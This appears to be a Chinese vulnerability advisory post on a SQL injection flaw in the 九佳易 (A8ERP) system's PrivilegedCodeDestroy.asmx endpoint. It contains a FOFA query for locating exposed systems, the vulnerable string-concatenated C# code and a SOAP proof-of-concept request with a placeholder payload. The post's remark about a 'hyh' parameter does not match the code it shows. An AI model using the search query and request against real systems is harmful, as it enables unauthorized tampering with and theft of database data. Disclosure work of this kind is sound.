九佳易管理系统 PrivilegedCodeDestroy.asmx SQL注入漏洞


漏洞简介

九佳易系统管理系统中的 PrivilegedCodeDestroy.asmx 通用处理程序接口存在SQL注入漏洞,该接口主要用于处理前端 AJAX 请求并与后端数据库进行交互。由于接口未对客户端传入的关键参数进行严格的输入校验、参数化处理或特殊字符转义,攻击者可通过构造恶意的 SQL 语句片段注入到请求参数中,使后端数据库执行非授权的 SQL 操作,进而窃取、篡改甚至销毁数据库中的敏感数据。

影响版本

fofa语法

title="VSQL" && body="/Scripts/Login_A8/"

漏洞分析

根据 Interface/licx/PrivilegedCodeDestroy.asmx 的代码引用

<%@ WebService Language="C#" CodeBehind="PrivilegedCodeDestroy.asmx.cs" Class="A8ERP.Interface.licx.PrivilegedCodeDestroy" %>

找到 A8ERP.Interface.licx.PrivilegedCodeDestroy 相关类的实现逻辑

using System;
using System.ComponentModel;
using System.Data.Common;
using System.Web.Services;

#nullable disable
namespace A8ERP.Interface.licx;

[WebService(Namespace = "http://tempuri.org/")]
[ToolboxItem(false)]
[WebServiceBinding]
public class PrivilegedCodeDestroy : WebService
{
  [WebMethod]
  public string UpdatePrivilegedState(string code)
  {
    DBHelp dbHelp = new DBHelp();
    dbHelp.Open();
    try
    {
      string sql = $"UPDATE privileged_state SET zt='1' WHERE code='{code}'";
      ((DbCommand) dbHelp.GetCommand(sql)).ExecuteNonQuery();
    }
    catch (Exception ex)
    {
    }
    finally
    {
      dbHelp.Close();
    }
    return "";
  }
}

非常明显拼接导致的SQL注入,参数code无任何过滤或校验被直接拼接到$"UPDATE privileged_state SET zt='1' WHERE code='{code}'";sql语句中,然后调用dbHelp.GetCommand(sql)).ExecuteNonQuery()方法进行执行,从而造成SQL注入漏洞。

漏洞复现

因为参数获取是通过this.Request["hyh"]的方式,因此支持get、post等常规方式外,还支持multipart格式

POST /Interface/licx/PrivilegedCodeDestroy.asmx HTTP/1.1
SOAPAction: http://tempuri.org/UpdatePrivilegedState
Content-Type: text/xml;charset=UTF-8
Host: a8erp.mrxn.net

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:tem="http://tempuri.org/">
   <soap:Header/>
   <soap:Body>
      <tem:UpdatePrivilegedState>
         <!--type: string-->
         <tem:code>SQLI_POC</tem:code>
      </tem:UpdatePrivilegedState>
   </soap:Body>
</soap:Envelope>

成功延时 5 秒


手机扫码阅读

大蚂蚁 (BigAnt) 即时通讯系统 updateLoginName SQL注入漏洞

九佳易管理系统 Ajax_XT.ashx SQL 注入漏洞

评 论